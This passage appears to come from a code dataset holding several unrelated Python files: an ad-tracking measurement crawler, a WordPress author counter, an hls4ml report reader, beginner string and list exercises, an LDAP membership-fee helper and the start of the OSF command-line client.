uniqad_category = {}
with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr:
bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\
Site-Context, BugCount, BugSrc\n')
for train_category, cat_dict in results.items():
totalad_category[train_category] = {}
uniqad_category[train_category] = {}
for test_site, bug_dict_list in cat_dict.items():
total_ads = 0 # for each site
uniq_ads = [] # for each site
for refresh_num in range(len(bug_dict_list)):
bug_dict = bug_dict_list[refresh_num]
for bug, bugcount in bug_dict.items():
if bug.is_ad():
uuid = bug.get_uuid()
bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(uuid, test_site,
refresh_num, train_category, 'N/A', bugcount, bug.get_src()))
total_ads += bugcount
if bug not in uniq_ads:
uniq_ads.append(bug)
totalad_category[train_category][test_site] = total_ads
uniqad_category[train_category][test_site] = len(uniq_ads)
totalads += total_ads # global count for total ads
with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr:
# write some metadata information about this session
ses_wtr.write('#VMID: %s\n' % vmid)
ses_wtr.write('#Session-Date: %s\n' % session_date)
ses_wtr.write('#Time to complete: %s\n' % process_ex_time)
ses_wtr.write('#Training Categories: %s\n' % str(results.keys()))
ses_wtr.write('#Total Number of ads: %d\n' % totalads)
ses_wtr.write('#Total Uniq ads: %d\n\n' % totaluniqads)
ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\n')
for train_category, cat_dict in results.items():
for test_site, bug_dict_list in cat_dict.items():
num_of_visit = len(bug_dict_list)
ses_wtr.write('{0}, {1}, {2}, {3}, {4}\n'.format(train_category,
test_site, num_of_visit, totalad_category[train_category][test_site],
uniqad_category[train_category][test_site]))
def export_ads(results,out_folder):
"""
This function creates a csv file which contains all the unique ads seen in
each test site (including all the refreshes)
TODO update the doc
results is a dictionary of the following
results = { Category : Value, ... }
value = { test_site_url : [ result1, result2, ... resultN], ... }
resultN : { WebBug : count, ... }
"""
try:
os.makedirs(out_folder)
except OSError:
LOG.debug('Creating output file folder ...')
export_ad_counter = 1 # assign unique number to ads for export to mturk
#short_listed_companies = ['google adsense', 'doubleclick']
with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr:
# write the titles
fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\n'.format(\
'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\
'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src'))
# make sure we only add one ad
for train_category, cat_dict in results.items():
for test_site, bug_dict_list in cat_dict.items():
for refresh_num in range(len(bug_dict_list)):
bug_dict = bug_dict_list[refresh_num]
for bug, bugcount in bug_dict.items():
if not bug.is_ad():
#TODO check bug_type in ffext
continue
if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:
file_name = '%d.%s' % (export_ad_counter, bug.get_filetype())
new_location = os.path.join(out_folder, file_name)
copy2(bug.get_filepath(), new_location)
fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\
\n'.format(file_name, bug.get_name(), bug.get_filetype(),
'' ,test_site, refresh_num, train_category, 'N/A', bugcount,
bug.get_src()))
export_ad_counter += 1
def get_bug_type(file_type):
is_ad = False
bug_type = 'text'
if file_type.startswith('HTML') or \
file_type.startswith('ASCII') or \
file_type.startswith('UTF-8 Unicode English') or \
file_type.startswith('very short') :
bug_type = 'text'
elif (file_type.endswith('1 x 1') and file_type.startswith('GIF')):
bug_type = 'gif'
elif file_type.startswith('PNG'):
bug_type = 'png'
is_ad = True
elif file_type.startswith('GIF'):
bug_type = 'gif'
is_ad = True
elif file_type.startswith('Macromedia Flash'):
bug_type = 'swf'
is_ad = True
elif file_type.startswith('JPEG'):
bug_type = 'jpg'
is_ad = True
return bug_type, is_ad
def parse_buginfo(entry):
"""
Takes the json decoded bug information and inserts it into a WebBug instance
"""
bugname = entry['bug']['name'].replace(' ','').replace('/','_')
bugsrc = entry['ent']['policyContentLocation']
bugpattern = entry['bug']['pattern']
try :
bugaffiliation = entry['bug']['affiliation']
except KeyError:
bugaffiliation = ""
bugtype = entry['bug']['type']
bugpathname = entry['ent']['pathname']
return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,
bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)
def curl_worker_legacy(args):
output_dir = args[0]
saved_file_name = args[1]
path = args[2]
bug = args[3]
curl_result_queue = args[4]
# subprocess.call(['curl', '-o', path , bug.get_src() ])
subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])
# Use the unix tool 'file' to check filetype
subpr_out = subprocess.check_output(['file', '-b', path]).strip()
filetype, is_ad = get_bug_type(subpr_out)
if is_ad:
new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))
else:
new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\
filetype))
os.rename(path, new_path)
bug.set_is_ad(is_ad)
bug.set_filetype(filetype)
bug.set_filepath(new_path)
curl_result_queue.put(bug)
def process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\
num_of_workers=8):
"""
This function goes through all the bugs identified by the firefox plugin and
aggregates each bug's occurence in a given page. The aggregation is necessary
for duplicate ads on the same page
"""
bug_dict = {} # dict to keep track of how many duplicates of each bug, if
# exists
try:
# separate the non-ads from the ads for ease of handchecking
os.makedirs(output_dir)
os.makedirs(os.path.join(output_dir, 'notad'))
except OSError:
pass
# uses a pool of 'curl' workers
curl_worker_pool = Pool(processes=num_of_workers)
manager = Manager()
curl_result_queue = manager.Queue()
dl_counter = 0 # keep track of how many bugs downloaded
while True:
try:
found_bugs = json.loads(ext_queue.get(block=True, timeout=2))
except Exception:
LOG.debug('Timing out on get from queue...')
break
for entry in found_bugs:
bugname = entry['bug']['name'].replace(' ','').replace('/','_')
bugsrc = entry['ent']['policyContentLocation']
bugpattern = entry['bug']['pattern']
try :
bugaffiliation = entry['bug']['affiliation']
except KeyError:
bugaffiliation = ""
bugtype = entry['bug']['type']
bugpathname = entry['ent']['pathname']
bug = WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,
bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)
try:
# matched an entry in the bugdict, incr count and continue
bug_dict[bug] += 1
continue
except KeyError:
bug_dict[bug] = 1
saved_location ='Visit%d_%s%d' % (refresh_count, bugname,\
dl_counter)
dl_counter += 1
save_to_path = os.path.join( output_dir, '%s' % saved_location)
obj = curl_worker_pool.apply_async(curl_worker_legacy, \
((output_dir, saved_location, save_to_path, bug, curl_result_queue),))
try:
sleep(0.5)
curl_worker_pool.join()
curl_worker_pool.close()
curl_worker_pool.terminate()
except Exception:
LOG.debug('Closing pool')
while not curl_result_queue.empty():
cbug = curl_result_queue.get()
# ugly code here
bugcount = bug_dict[cbug]
del bug_dict[cbug]
bug_dict[cbug] = bugcount
with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:
cPickle.dump(bug_dict, fwtr)
result_queue.put(bug_dict)
def curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\
ack_queue):
while True:
try:
task = input_queue.get()
if len(task) == 1 and task[0] == "STOP":
LOG.debug('curl_worker %d received stop' % worker_id)
break
except Exception:
LOG.error('Error:')
#LOG.debug(task)
saved_file_name = task[0]
path = task[1]
bug = task[2]
try:
# subprocess.call(['curl', '-o', path , bug.get_src()])
subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])
subpr_out = subprocess.check_output(['file', '-b', path]).strip()
except Exception as e :
LOG.debug('Exception captured %s\n\n' % e)
filetype, is_ad = get_bug_type(subpr_out)
if is_ad:
new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))
else:
new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\
filetype))
os.rename(path, new_path)
bug.set_is_ad(is_ad)
bug.set_filetype(filetype)
bug.set_filepath(new_path)
worker_output_queue.put(bug)
ack_queue.put(worker_id)
return
def build_nodes(jsonData):
"""
This function takes a JSON encoded output of the firefox addon and builds a
call graph for the javascript/HTML redirections
@rtype nodes: dict
@return: A graph of redirection chains
"""
nodes = {}
def _process_cookiestr(cookieStr):
"""
parses a dictionary of req/resp calls to extract the cookie information
returns a list of cookies set on this domain
"""
cookie_list = []
# parses cookie str if a cookie has been set
for cookie in cookieStr.split('\n'):
c = {}
for cook in cookie.split(';'):
token = cook.split('=', 1)
if len(token) < 2:
# usually this is just a flag e.g HTTPOnly, HTTPSOnly
continue
c[token[0]] = token[1]
cookie_list.append(c)
return cookie_list
def _check_node(d):
try:
domain_node = nodes[d]
except KeyError:
isBug, bug_name, bug_type = ADREGEX.search(domain)
domain_node = WebNode(domain, isBug, bug_name, bug_type)
nodes[d] = domain_node
return domain_node
#jsonData contains all the domains and all the req/resp pairs made to them
#iterating over the domains first
for domain, dval in jsonData.items():
# but first check if a node for this domain has been created or not
domain_node = _check_node(domain)
cookie_list = []
# iterating thru all the req/resp pairs on a domain
for info in dval:
domainPath = info['domainPath']
referrerPath = info['referrerPath']
referrer = info['referrer']
cookieBool = info['cookie']
parsed_cookie = None
if cookieBool:
cookieStr = info['cookiestr']
parsed_cookie = _process_cookiestr(cookieStr)
cookie_list.append(parsed_cookie)
domain_node.add_reqresp({'domainPath' : domainPath,
'referrer' : referrer,
'referrerPath' : referrerPath,
'cookieList' : parsed_cookie
})
# making sure that we also create the node for the referrer
referrer_node = _check_node(referrer)
referrer_node.add_child(domain_node)
domain_node.add_parent(referrer_node)
domain_node.set_cookies(cookie_list)
return nodes
def filter_results(extQueue, timeout_value, url):
"""
This function takes the JSON output of the firefox addon, and matches the
request URL against a list of known tracker/ads regexes.
Returns data structure containing request/resp info
Returns None if did not receive results from FF addon
"""
from Queue import Empty
try:
LOG.debug('Timeout value in filter_result :%d' % timeout_value)
nodes = extQueue.get(True, timeout=timeout_value)
except Empty as e:
LOG.info('Did not receive any results from FF plugin for %s' % url)
nodes = None
finally:
while not extQueue.empty():
extQueue.get()
return nodes
def process_results(refresh_count, output_dir, ext_queue, result_queue,
num_of_workers=8):
"""
This function goes through all the bugs identified by the firefox plugin and
aggregates each bug's occurence in a given page. The aggregation is necessary
for duplicate ads on the same page
"""
workers_dict = {} # keep track of worker processes
input_queue = Queue() # asynchronously feed workers task to do
worker_output_queue = Queue() # output queue from workers
ack_queue = Queue()
bug_dict = {} # dict to keep track of how many duplicates of each bug, if
# exists
try:
# separate the non-ads from the ads for ease of handchecking
os.makedirs(output_dir)
os.makedirs(os.path.join(output_dir, 'notad'))
except OSError:
# Directory is created, Okay to pass
pass
for i in range(num_of_workers):
p = Process(target=curl_worker, args=(output_dir, input_queue,\
worker_output_queue, i, ack_queue))
p.start()
workers_dict[i] = p
# uses a pool nodesurl' workers
# curl_worker_pool = Pool(processes=8)
# manager = Manager()
# curl_result_queue = manager.Queue()
dl_counter = 0 # keep track of how many bugs downloaded
while True:
try:
found_bugs = json.loads(ext_queue.get(block=True, timeout=2))
except Exception:
LOG.debug('No more bugs found, break out of queue')
break
for entry in found_bugs:
bug = parse_buginfo(entry)
try:
# matched an entry in the bugdict, incr count and continue
bug_dict[bug] += 1
continue
except KeyError:
bug_dict[bug] = 1
try:
saved_location ='Visit%d_%s%d' % (refresh_count, bug.get_name(), dl_counter)
dl_counter += 1
save_to_path = os.path.join( output_dir, '%s' % saved_location)
input_queue.put((saved_location, save_to_path, bug))
except Exception as e:
LOG.exception('%s' % e)
for i in range(num_of_workers):
# send stop signal
input_queue.put(("STOP",))
stopped = 0
while stopped < len(workers_dict):
ack = ack_queue.get()
p = workers_dict[ack]
p.join(timeout=1)
if p.is_alive():
p.terminate()
LOG.debug('terminating process %d' % ack)
stopped += 1
while not worker_output_queue.empty():
# receive results from the worker
cbug = worker_output_queue.get()
# ugly code here
bugcount = bug_dict[cbug]
del bug_dict[cbug]
bug_dict[cbug] = bugcount
with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:
cPickle.dump(bug_dict, fwtr)
result_queue.put(bug_dict)
return
|
8,086 | cf5062c999c6c29f103428c247d8d1a4550f9d75 | file = open('thegazelle.wordpress.2016-06-22.xml', 'r')
text = file.read()
authors = []
start = text.find("<wp:author_display_name>")
length = len("<wp:author_display_name>")
end = text.find("</wp:author_display_name")
authors.append(text[start+length+len("<![CDATA["):end-len("]]>")])
while text.find("<wp:author_display_name>", start+1) != -1:
start = text.find("<wp:author_display_name>", start+1)
end = text.find("</wp:author_display_name>", end+1)
authors.append(text[start+length+len("<![CDATA["):end-len("]]>")])
authors.sort()
for author in authors:
print(author)
for i in range(len(authors)-1):
if (authors[i] == authors[i+1]):
print(authors[i], "was double counted")
print(len(authors)) |
8,087 | 7d173b0571c20dc8fcae884451e8f69ba3a05763 | from __future__ import print_function
import os
import re
import xml.etree.ElementTree as ET
def read_vivado_report(hls_dir, full_report=False):
if not os.path.exists(hls_dir):
print('Path {} does not exist. Exiting.'.format(hls_dir))
return
prj_dir = None
top_func_name = None
if os.path.isfile(hls_dir + '/build_prj.tcl'):
prj_dir, top_func_name = _parse_build_script(hls_dir + '/build_prj.tcl')
if prj_dir is None or top_func_name is None:
print('Unable to read project data. Exiting.')
return
sln_dir = hls_dir + '/' + prj_dir
if not os.path.exists(sln_dir):
print('Project {} does not exist. Rerun "hls4ml build -p {}".'.format(prj_dir, hls_dir))
return
solutions = _find_solutions(sln_dir)
print('Found {} solution(s) in {}.'.format(len(solutions), sln_dir))
for sln in solutions:
print('Reports for solution "{}":\n'.format(sln))
_find_reports(sln_dir + '/' + sln, top_func_name, full_report)
def _parse_build_script(script_path):
prj_dir = None
top_func_name = None
with open(script_path, 'r') as f:
for line in f.readlines():
if 'open_project' in line:
prj_dir = line.split()[-1]
elif 'set_top' in line:
top_func_name = line.split()[-1]
return prj_dir, top_func_name
def _find_solutions(sln_dir):
solutions = []
if os.path.isfile(sln_dir + '/vivado_hls.app'):
with open(sln_dir + '/vivado_hls.app') as f:
# Get rid of namespaces (workaround to support two types of vivado_hls.app files)
xmlstring = re.sub(' xmlns="[^"]+"', '', f.read(), count=1)
root = ET.fromstring(xmlstring)
for sln_tag in root.findall('solutions/solution'):
sln_name = sln_tag.get('name')
if sln_name is not None and os.path.isdir(sln_dir + '/' + sln_name):
solutions.append(sln_name)
return solutions
def _find_reports(sln_dir, top_func_name, full_report=False):
csim_file = sln_dir + '/csim/report/{}_csim.log'.format(top_func_name)
if os.path.isfile(csim_file):
_show_csim_report(csim_file)
else:
print('C simulation report not found.')
syn_file = sln_dir + '/syn/report/{}_csynth.rpt'.format(top_func_name)
if os.path.isfile(syn_file):
_show_synth_report(syn_file, full_report)
else:
print('Synthesis report not found.')
def _show_csim_report(csim_file):
with open(csim_file, 'r') as f:
print('C SIMULATION RESULT:')
print(f.read())
def _show_synth_report(synth_file, full_report=False):
with open(synth_file, 'r') as f:
print('SYNTHESIS REPORT:')
for line in f.readlines()[2:]:
if not full_report and '* DSP48' in line:
break
print(line, end = '')
|
8,088 | c7c405535b2ca656d4d5f18013e3e2fdef70efea | """
1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,
если больше в верхнем - вывести все в верхнем,
если поровну - вывести в противоположных регистрах.
2. Если в строке каждое слово начинается с заглавной буквы, тогда
добавить в начало строки 'done. '.
Иначе заменить первые 5 элементов строки на 'draft: '.
(можно использовать метод replace и/или конкатенацию строк + срезы)
3. Если длина строки больше 20, то обрезать лишние символы до 20.
Иначе дополнить строку символами '@' до длины 20.
(можно использовать метод ljust либо конкатенацию и дублирование (+ и *))
После выполнения кажого пункта выводить результат типа:
1. Исходная строка: "some string".
Результат: "some edited string".
(Использовать форматирование строк f либо метод format)
"""
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'
upp_regist = low_regist = title_regist = 0
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
|
8,089 | d726e468a9df26f1bcb8a016812b87fad7b41aa8 | from brie.config import ldap_config
from brie.model.ldap import *
from brie.lib.log_helper import BrieLogging
import datetime
import smtplib
class Residences:
@staticmethod
def get_dn_by_name(user_session, name):
result = user_session.ldap_bind.search_first(ldap_config.liste_residence_dn, "(cn=" + name + ")")
if result is None:
return None
#end if
return result.uniqueMember.first()
#end def
@staticmethod
def get_name_by_dn(user_session, dn):
result = user_session.ldap_bind.search_first(ldap_config.liste_residence_dn, "(uniqueMember=" + dn + ")")
if result is None:
return None
#end if
return result.cn.first()
#end def
@staticmethod
def get_residences(user_session):
return user_session.ldap_bind.search(ldap_config.liste_residence_dn, "(objectClass=groupOfUniqueNames)")
#end def
#end class
class CotisationComputes:
@staticmethod
def current_year():
now = datetime.datetime.now()
if now.month > 8:
return now.year + 1
return now.year
#end def
@staticmethod
def registration_current_year():
now = datetime.datetime.now()
if now.month > 8:
return now.year
return now.year - 1
#end def
@staticmethod
def get_available_months(start, end, paid_months = []):
next_months_available = []
if start > 12 or end > 12:
raise Exception("invalid start or end")
if start > 8 and end > 8:
next_months_available = range(start, end + 1)
elif start <= 8 and end < 9:
next_months_available = range(start, end + 1)
elif start > 8:
next_months_available = range(start, 13) + range(1, end + 1 )
else:
raise Exception("invalid start and end")
#end if
if paid_months == []:
return next_months_available
BrieLogging.get().debug(next_months_available)
available_months = [
month
for month in next_months_available
if month not in paid_months
]
return available_months
#end def
@staticmethod
def is_valid_month(month):
now = datetime.datetime.now()
if now.month > 8:
return (month >= now.month and month < 13) or (month >= 1 and month < 9)
else:
return month >= now.month and month < 9
#end if
#end def
@staticmethod
def price_to_pay(year_price, month_price, already_paid, number_months_to_pay):
months_price = number_months_to_pay * month_price
BrieLogging.get().debug("already paid : " + str(already_paid))
BrieLogging.get().debug("months price : " + str(months_price))
if already_paid + months_price > year_price:
months_price = max(0, year_price - already_paid)
return months_price
#end def
@staticmethod
def anniversary_from_ldap_items(ldap_cotisations):
result = []
months = []
SORT_ORDER = {9: 0, 10: 1, 11: 2, 12: 3, 1: 4, 2: 5, 3: 6, 4: 7, 5: 8, 6: 9, 7: 10, 8: 11}
for cotisation in ldap_cotisations:
cotisation_months = []
anniversary_data = cotisation.get("x-time").first()
anniversary_datetime = datetime.datetime.strptime(anniversary_data,
"%Y-%m-%d %H:%M:%S.%f")
for month in cotisation.get("x-validMonth").all():
months.append(int(month))
cotisation_months.append(int(month))
#end for
cotisation_months.sort(key=lambda val: SORT_ORDER[val])
result.append((anniversary_datetime, cotisation_months))
#end for
anniversary = 0
# tri par ordre d'inscription
result = sorted(result)
previousMonth = -1
months.sort(key=lambda val: SORT_ORDER[val])
#on scanne chaque cotisation
for resultat in result:
#si on n'est pas la premiere cotisation et que les cotisations sont sans interruptions (pas de mois manquants)
#la date anniversaire reste la meme
if previousMonth != -1 and ( (resultat[1][0] == 1 and previousMonth == 12) or (resultat[1][0] == previousMonth + 1) ):
previousMonth = resultat[1][-1]
continue;
#sinon on recalcule la date anniversaire
else :
previousMonth = resultat[1][-1]
#end if
anniversary_day = resultat[0].day
anniversary_month = months[-1] + 1
if anniversary_month == 13:
anniversary_month = 1
if anniversary_month > 9 or resultat[0].month < 9:
#on reste avec une annee d'anniversaire sur l'annee de la cotisation si l'anniversaire est entre septembre et decembre, mais on met aussi l'annee_anniversaire la meme annee que la cotisation si on a cotise entre janvier et aout
anniversary_year = resultat[0].year
else :
#sinon, c'est qu'on a cotise entre septembre et decembre et que notre fin de cotisation est l'annee suivante, donc on fait un +1
anniversary_year = resultat[0].year + 1
anniversary = datetime.datetime.strptime(str(anniversary_year) + "-" + str(anniversary_month) + "-1 0:0", "%Y-%m-%d %H:%M") + datetime.timedelta(days=(anniversary_day - 1))
#end for
if anniversary == 0:
anniversary = datetime.datetime(1999, 1, 31, 12, 0)
return anniversary
#end def
@staticmethod
# fonction de renvoi de la date anniversaire qui est la date actuelle au cas ou il n'a pas cotise depuis 30 jours, sinon date anniversaire actuelle
def generate_new_anniversary_from_ldap_items(ldap_cotisations):
anniversary = CotisationComputes.anniversary_from_ldap_items(ldap_cotisations)
now = datetime.datetime.now()
if anniversary == 0 or (now - anniversary).days > 30:
return now
else :
return anniversary
#end if
#end def
@staticmethod
# old = SDF or no cotisation this year
def is_old_member(member_dn, user_session, residence_dn, cotisations = None):
if cotisations is None:
current_year = CotisationComputes.current_year()
cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
#end if
#en septembre, on ne met pas de membre en old afin que les anciens ne soient pas deconnectes
return Room.get_by_member_dn(user_session, residence_dn, member_dn) == None or (datetime.datetime.now().month != 9 and cotisations == [])
#end def
@staticmethod
# no cotisation for the new year and last year august didn't payed
def is_member_to_delete(member, user_session, residence_dn):
current_year = CotisationComputes.current_year()
cotisations_this_year = Cotisation.cotisations_of_member(user_session, member.dn, current_year)
cotisations_previous_year = Cotisation.cotisations_of_member(user_session, member.dn, current_year - 1)
if cotisations_this_year == [] and cotisations_previous_year == []:
return True
now = datetime.datetime.now()
if now.month < 9:
last_year = datetime.datetime(now.year - 1, 8, 31, 12, 0)
else:
last_year = datetime.datetime(now.year, 8, 31, 12, 0)
#end if
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations_previous_year)
#end if
#si il a pas cotise cette annee et qu'il n'avait pas pris jusqua fin aout l'an dernier
delta = (last_year - anniversary)
return cotisations_this_year == [] and (delta.days > 7 or Room.get_by_member_dn(user_session, residence_dn, member.dn) == None)
#end def
@staticmethod
# 7 days grace period
def is_cotisation_was_paid_last_year(member_dn, user_session, residence_dn, cotisations = None, anniversary = None):
if cotisations is None:
current_year = CotisationComputes.current_year() - 1
#end if
now = datetime.datetime.now()
if now.month < 9:
last_year = datetime.datetime(now.year - 1, 8, 31, 12, 0)
else:
last_year = datetime.datetime(now.year, 8, 31, 12, 0)
#end if
if cotisations is None:
cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
#end if
if anniversary is None:
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
#end if
delta = (last_year - anniversary)
return delta.days <= 7
#end def
@staticmethod
# 7 days grace period
def is_cotisation_paid(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
return False
if cotisations is None:
current_year = CotisationComputes.current_year()
#end if
now = datetime.datetime.now()
if cotisations is None:
cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
#end if
if anniversary is None:
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
#end if
delta = (now - anniversary)
if delta.days > 7 and now.month == 9 and CotisationComputes.is_cotisation_was_paid_last_year(member_dn, user_session, residence_dn):
#le membre etait a jour en aout, on lui autorise un delai de paiement en septembre - pas de deconnexion
return True
#end if
return delta.days <= 7
#end def
@staticmethod
# less than a month late but more than a week
def is_cotisation_late(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
return False
if cotisations is None:
current_year = CotisationComputes.current_year()
#end if
now = datetime.datetime.now()
if cotisations is None:
cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
#end if
if anniversary is None:
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
#end if
delta = (now - anniversary)
#print("[DEBUG] cotisation en retard pour l'utilisateur "+ member.dn +" now="+ str(now) +" anniversary="+ str(anniversary) +" delta="+ str(delta))
return delta.days <= 30 and delta.days > 7
#end def
def cotisation_late_reminder(member_dn, user_session, residence_dn):
member = Member.get_by_dn(user_session,member_dn)
from_mail = "noreply@fede-aurore.net"
to_mail = [member.mail.first()]
residence_name = Residences.get_name_by_dn(user_session,residence_dn).decode("utf-8").encode("ascii", "ignore")
#end def
@staticmethod
# more than a month late
def is_no_cotisation(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
return False
if cotisations is None:
current_year = CotisationComputes.current_year()
#end if
now = datetime.datetime.now()
if cotisations is None:
cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
#end if
if anniversary is None:
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
#end if
delta = (now - anniversary)
return delta.days > 30
#end def
@staticmethod
def members_status_from_residence(user_session, residence_dn):
members = Member.get_all(user_session, residence_dn)
old_members = []
cotisation_paid_members = []
cotisation_late_members = []
no_cotisation_members = []
for member in members:
current_year = CotisationComputes.current_year()
cotisations = Cotisation.cotisations_of_member(user_session, member.dn, current_year)
if CotisationComputes.is_old_member(member.dn, user_session, residence_dn, cotisations):
old_members.append(member)
elif CotisationComputes.is_cotisation_paid(member.dn, user_session, residence_dn, cotisations):
cotisation_paid_members.append(member)
elif CotisationComputes.is_cotisation_late(member.dn, user_session, residence_dn, cotisations):
cotisation_late_members.append(member)
#print("[DEBUG] cotisation en retard pour l'utilisateur "+ member.dn)
elif CotisationComputes.is_no_cotisation(member.dn, user_session, residence_dn, cotisations):
no_cotisation_members.append(member)
else:
BrieLogging.get().warn("aurore_helper:336 member with weird status !")
#end if
#end for
return dict(old_members=old_members, cotisation_paid_members=cotisation_paid_members, cotisation_late_members=cotisation_late_members, no_cotisation_members=no_cotisation_members)
#end def
@staticmethod
def members_status_from_list_cotisations(user_session, residence_dn, cotisations):
members_dict = dict()
for cotisation in cotisations:
cotisation_dn = cotisation.dn.split(",")
member_dn = ""
for i in range(3, len(cotisation_dn)):
if i != 3:
member_dn += ","
#end if
member_dn += cotisation_dn[i]
#end for
if not member_dn in members_dict:
members_dict[member_dn] = [cotisation]
else:
members_dict[member_dn].append(cotisation)
#end if
#end for
BrieLogging.get().debug(str(datetime.datetime.now()) + "members_status_from_list_cotisations:" + str(len(members_dict)))
old_members = []
cotisation_paid_members = []
cotisation_late_members = []
no_cotisation_members = []
#on va verifier en un block quels sont les old_members
for member_dn, cotisations in members_dict.iteritems():
old_members.append(member_dn)
#end for
rooms = Room.get_rooms(user_session, residence_dn)
for room in rooms:
#pour chaque chambre, on check si il a un proprietaire, et si ce dernier a des cotisations
if room.has("x-memberIn") and room.get("x-memberIn").first() in members_dict and room.get("x-memberIn").first() in old_members:
#si oui, bah on le retire des old_members
old_members.remove(room.get("x-memberIn").first())
#endif
#endfor
for member_dn, cotisations in members_dict.iteritems():
anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
if CotisationComputes.is_cotisation_paid(member_dn, user_session, residence_dn, cotisations, anniversary, False):
cotisation_paid_members.append(member_dn)
elif CotisationComputes.is_cotisation_late(member_dn, user_session, residence_dn, cotisations, anniversary, False):
cotisation_late_members.append(member_dn)
#print("[DEBUG] cotisation en retard pour l'utilisateur "+ member.dn)
elif CotisationComputes.is_no_cotisation(member_dn, user_session, residence_dn, cotisations, anniversary, False):
no_cotisation_members.append(member_dn)
else:
BrieLogging.get().debug("aurore_helper:393 : member with weird status !")
#end if
#end for
return dict(old_members=old_members, cotisation_paid_members=cotisation_paid_members, cotisation_late_members=cotisation_late_members, no_cotisation_members=no_cotisation_members)
#end def
#end class
|
8,090 | 3752b68e151379c57e1494715a45172607f4aead | # file = open('suifeng.txt')
# # text = file.read()
# # print(text)
# # file.close()
# with open('suifeng.txt') as f:
# print(f.read())
newList=[]
for i in range(11):
newList.append(i*2)
print(newList)
newList2=[i*2 for i in range(11)]
print(newList2)
list = ["小米","王银龙","王思"]
emptyList=[]
for name in list:
if name.startswith('王'):
emptyList.append(name)
print(emptyList)
print([name for name in list if name.startswith('王')]) |
8,091 | ca551d8e55ebb15a03077af5695782c6d72ff2fd | """Command line interface to the OSF
These functions implement the functionality of the command-line interface.
"""
from __future__ import print_function
from functools import wraps
import getpass
import os
import sys
from six.moves import configparser
from six.moves import input
from tqdm import tqdm
from .api import OSF
from .exceptions import UnauthorizedException
from .utils import norm_remote_path, split_storage, makedirs, checksum
def config_from_file():
if os.path.exists(".osfcli.config"):
config_ = configparser.ConfigParser()
config_.read(".osfcli.config")
# for python2 compatibility
config = dict(config_.items('osf'))
else:
config = {}
return config
def config_from_env(config):
username = os.getenv("OSF_USERNAME")
if username is not None:
config['username'] = username
project = os.getenv("OSF_PROJECT")
if project is not None:
config['project'] = project
return config
def _get_username(args, config):
if args.username is None:
username = config.get('username')
else:
username = args.username
return username
def _setup_osf(args):
# Command line options have precedence over environment variables,
# which have precedence over the config file.
config = config_from_env(config_from_file())
username = _get_username(args, config)
project = config.get('project')
if args.project is None:
args.project = project
# still None? We are in trouble
if args.project is None:
sys.exit('You have to specify a project ID via the command line,'
' configuration file or environment variable.')
password = None
if username is not None:
password = os.getenv("OSF_PASSWORD")
# Prompt user when password is not set
if password is None:
password = getpass.getpass('Please input your password: ')
return OSF(username=username, password=password)
def might_need_auth(f):
"""Decorate a CLI function that might require authentication.
Catches any UnauthorizedException raised, prints a helpful message and
then exits.
"""
@wraps(f)
def wrapper(cli_args):
try:
return_value = f(cli_args)
except UnauthorizedException as e:
config = config_from_env(config_from_file())
username = _get_username(cli_args, config)
if username is None:
sys.exit("Please set a username (run `osf -h` for details).")
else:
sys.exit("You are not authorized to access this project.")
return return_value
return wrapper
def init(args):
